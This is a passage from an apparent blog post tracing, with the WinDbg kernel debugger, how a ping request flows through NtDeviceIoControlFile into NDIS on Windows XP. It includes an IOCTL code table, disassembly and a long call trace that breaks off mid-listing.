8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier 
New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Breakpoint 4 hit</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ping!main+0x9ad:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 001b:01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span></span></blockquote><ul><ul><li> The summary of 
<b>IoControlCode</b> values sent to the kernel:</li>
</ul></ul><ul><ul><table align="center" border="1"><tbody>
<tr><td align="center"><b>IOCTL_CODE (hex)</b></td><td align="center"><b>FILE_DEVICE_TYPE (upper 16 bits of the code)</b></td></tr>
<tr><td>120000</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120003</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120040</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120090</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>21009a</td><td>FILE_DEVICE_TRANSPORT</td></tr>
<tr><td>17003e</td><td>FILE_DEVICE_PHYSICAL_NETCARD</td></tr>
</tbody></table></ul></ul><ul><ul><li>We want to check the flow when packets passed to the NIC driver, we focus on <b>FILE_DEVICE_PHYSICAL_NETCARD. </b>Before that check out this disassembly first:</li>
</ul></ul><blockquote><blockquote><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> u nt!NtDeviceIoControlFile l20</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d592 55 push ebp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d593 8bec mov ebp,esp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d595 6a01 push 1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d597 ff752c push dword ptr [ebp+2Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d59a ff7528 push dword ptr [ebp+28h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d59d ff7524 push dword ptr [ebp+24h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a0 ff7520 push dword ptr [ebp+20h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a3 ff751c push dword ptr [ebp+1Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a6 ff7518 push dword ptr [ebp+18h]</span><br style="font-family: "Courier New",Courier,monospace;" 
/><span style="font-family: "Courier New",Courier,monospace;">8056d5a9 ff7514 push dword ptr [ebp+14h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5ac ff7510 push dword ptr [ebp+10h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5af ff750c push dword ptr [ebp+0Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5b2 ff7508 push dword ptr [ebp+8]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5b5 e854e8ffff call nt!IopXxxControlFile (81a62764)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5ba 5d pop ebp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5bb c22800 ret 28h</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5be 90 nop</span></span> </blockquote></blockquote></div><blockquote><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> bp 8056d5b5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Breakpoint 2 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!NtDeviceIoControlFile+0x25:</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">8056d5b5 e8bc700000 call nt!IopXxxControlFile (80574676)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> wt</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 1] nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 48 19 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 2] nt!ExMapHandleToPointerEx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 29 0 [ 3] nt!ExpLookupHandleTableEntry</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 36 29 [ 2] nt!ExMapHandleToPointerEx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 67 65 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> 22 0 [ 2] nt!ExUnlockHandleTableEntry</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 83 87 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 72 189 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 1] nt!ObfReferenceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 82 203 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 1] nt!IoGetRelatedDeviceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 97 226 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 1] nt!IoAllocateIrp</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 38 19 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; 
font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 207 33 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 2] nt!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 208 42 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 158 481 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 25 0 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 2] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" 
/><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 3] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 14 [ 2] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 46 87 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 63 0 [ 2] nt!PsChargeProcessPoolQuota</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 51 150 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 2] nt!ObfReferenceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 59 164 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: 
yellow; font-family: "Courier New",Courier,monospace;"> 194 704 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 27 0 [ 1] nt!IoAllocateMdl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 55 14 [ 1] nt!IoAllocateMdl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 206 773 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 1] nt!IopGetMountFlag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] 
nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 123 19 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 199 24 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 3] nt!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 200 33 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 233 [ 1] nt!IopGetMountFlag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 232 1017 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 2] hal!KfRaiseIrql</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 28 7 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" 
/><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 2] nt!IopUpdateOtherOperationCount</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedAddLargeStatistic</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 32 19 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!IofCallDriver</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 2] nt!IopfCallDriver</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 64 0 [ 3] NDIS!ndisDeviceControlIrpHandler</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 4] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 5] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 5] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 5] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: 
"Courier New",Courier,monospace;"> 5 0 [ 5] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 14 [ 4] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 108 87 [ 3] NDIS!ndisDeviceControlIrpHandler</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 42 0 [ 4] nt!MmMapLockedPagesSpecifyCache</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 5] nt!MiReserveSystemPtes</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 43 0 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 12 0 [ 7] nt!ExfInterlockedCompareExchange64</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 50 12 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 7] nt!InterlockedPushEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 56 25 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 81 [ 5] 
nt!MiReserveSystemPtes</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 123 125 [ 4] nt!MmMapLockedPagesSpecifyCache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: lime;">122 335 [ 3] NDIS!ndisDeviceControlIrpHandler </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: lime;">31 0 [ 4] NDIS!ndisQueryStatisticsOids </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;">71 0 [ 5] nt!ExAllocatePoolWithTag</span></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 6] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 173 5 [ 5] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 104 178 [ 4] NDIS!ndisQueryStatisticsOids</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 52 0 [ 5] NDIS!ndisValidOid</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 120 230 [ 4] NDIS!ndisQueryStatisticsOids</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 20 0 [ 5] 
NDIS!ndisQueryDeviceOid</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 7] NDIS!ndisReferencePackage</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 57 0 [ 8] nt!MmLockPagableSectionByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 0 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 10] hal!KfRaiseIrql</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 28 7 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 10] nt!ExAcquireResourceExclusiveLite</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 30 30 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 10] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 489 35 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 31 0 [ 10] nt!ExReleaseResourceLite</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 496 66 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 562 [ 8] nt!MmLockPagableSectionByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 10 635 [ 7] NDIS!ndisReferencePackage</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 27 645 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 7] nt!KeInitializeEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 659 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 7] hal!KfAcquireSpinLock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 47 664 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 7] nt!PsGetCurrentThread</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 52 666 [ 
6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 7] NDIS!ndisMQueueRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 58 675 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 7] nt!PsGetCurrentThread</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 62 677 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" 
/><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] 